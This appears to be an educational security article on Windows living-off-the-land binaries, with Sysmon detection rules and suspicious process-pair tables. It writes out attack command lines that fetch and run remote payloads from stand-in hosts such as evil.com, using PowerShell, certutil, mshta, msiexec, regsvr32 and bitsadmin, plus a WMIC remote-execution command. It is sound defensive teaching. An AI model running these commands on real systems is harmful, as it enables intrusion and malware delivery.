How attackers abuse legitimate signed Windows binaries to download payloads, execute code, and bypass security controls — with command examples for nine LOLBins and detection strategies using Sysmon.
Sign in to mark this article as read and track your progress.
Instead of dropping custom executables that antivirus can scan, attackers use legitimate Windows binaries already present on every machine. Security tools struggle to block these binaries because doing so would break legitimate administrative functions.
Definition: Living-off-the-Land Binaries (LOLBins) are legitimate, signed Windows executables that can be abused to download files, execute code, or bypass security controls. Because they are trusted system components, their malicious use often evades application whitelisting and endpoint detection.
The LOLBAS Project (lolbas-project.github.io) maintains the authoritative catalogue of all known LOLBins with abuse scenarios and detection guidance.
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
-Command "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"
Downloads and executes a script entirely in memory. No file touches disk.
-NoProfile — skips profile script (faster, avoids logging side effects)-ExecutionPolicy Bypass — ignores signing requirements-WindowStyle Hidden — no visible console windowIEX (Invoke-Expression) — executes the downloaded string as codecertutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe
certutil.exe -decode encoded.txt payload.exe
Originally a certificate management tool. Abused to download arbitrary files (-urlcache) and decode Base64 payloads (-decode).
mshta.exe http://evil.com/payload.hta
mshta.exe javascript:"\..\mshtml,RunHTMLApplication";alert('pwned')
Executes HTML Applications (HTA) with full OS access. Bypasses PowerShell execution policy entirely because it uses a different scripting engine.
msiexec /q /i http://evil.com/payload.msi
Downloads and executes a malicious .msi package silently (/q = quiet mode).
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll
Executes a remote scriptlet (.sct) containing VBScript or JScript. Bypasses AppLocker because regsvr32.exe is typically whitelisted. Known as the "Squiblydoo" technique.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
rundll32.exe url.dll,OpenURL http://evil.com/payload
Beyond loading DLLs, rundll32.exe can execute JavaScript via the mshtml COM object and open URLs via url.dll.
wmic /node:192.168.1.50 /user:admin /password:P@ss process call create "cmd /c ..."
Executes commands on remote machines using WMI. No file is dropped on the remote machine. Common for lateral movement after credential theft.
bitsadmin /transfer job /download /priority high http://evil/p.exe C:\p.exe
Background Intelligent Transfer Service — designed for Windows Update downloads. Abused for silent background file downloads that survive reboots.
wscript.exe //E:vbscript payload.vbs
cscript.exe //E:jscript payload.js
Execute VBScript and JScript files. Initial access brokers distribute phishing attachments that invoke these engines. The //E flag forces a specific script engine regardless of file extension.
| Category | LOLBins | What They Enable |
|---|---|---|
| File download | certutil, bitsadmin, msiexec, powershell | Stage 2 payload retrieval without a custom downloader |
| Code execution | mshta, regsvr32, rundll32, wscript | Run scripts and code bypassing execution policy |
| Lateral movement | wmic, powershell | Execute commands on remote systems using stolen credentials |
| Encoding/decoding | certutil -decode | Decode Base64 payloads already on disk |
Sysmon (System Monitor) logs process creation events with full command-line arguments. Event ID 1 captures every process launch.
<!-- Alert: certutil downloading a file -->
<Rule name="certutil_download" groupRelation="and">
<Image condition="end with">certutil.exe</Image>
<CommandLine condition="contains any">-urlcache;-split</CommandLine>
</Rule>
<!-- Alert: PowerShell encoded command -->
<Rule name="ps_encoded" groupRelation="and">
<Image condition="end with">powershell.exe</Image>
<CommandLine condition="contains any">-enc;-EncodedCommand</CommandLine>
</Rule>
<!-- Alert: regsvr32 loading remote scriptlet -->
<Rule name="squiblydoo" groupRelation="and">
<Image condition="end with">regsvr32.exe</Image>
<CommandLine condition="contains">scrobj.dll</CommandLine>
</Rule>
These parent-child pairs should almost never occur legitimately:
| Parent | Child | Implication |
|---|---|---|
winword.exe | powershell.exe | Office macro launching PowerShell |
outlook.exe | cmd.exe | Email attachment executing shell |
excel.exe | mshta.exe | XLM macro or DDE launching HTA |
winword.exe | wscript.exe | Macro executing VBScript |
explorer.exe | regsvr32.exe /i:http | User tricked into double-clicking |
Any of these in Sysmon Event ID 1 is a high-confidence detection.
The LOLBAS Project at lolbas-project.github.io documents every known LOLBin, LOLLib, and LOLScript with:
Bookmark it. It is the definitive reference for LOLBin research.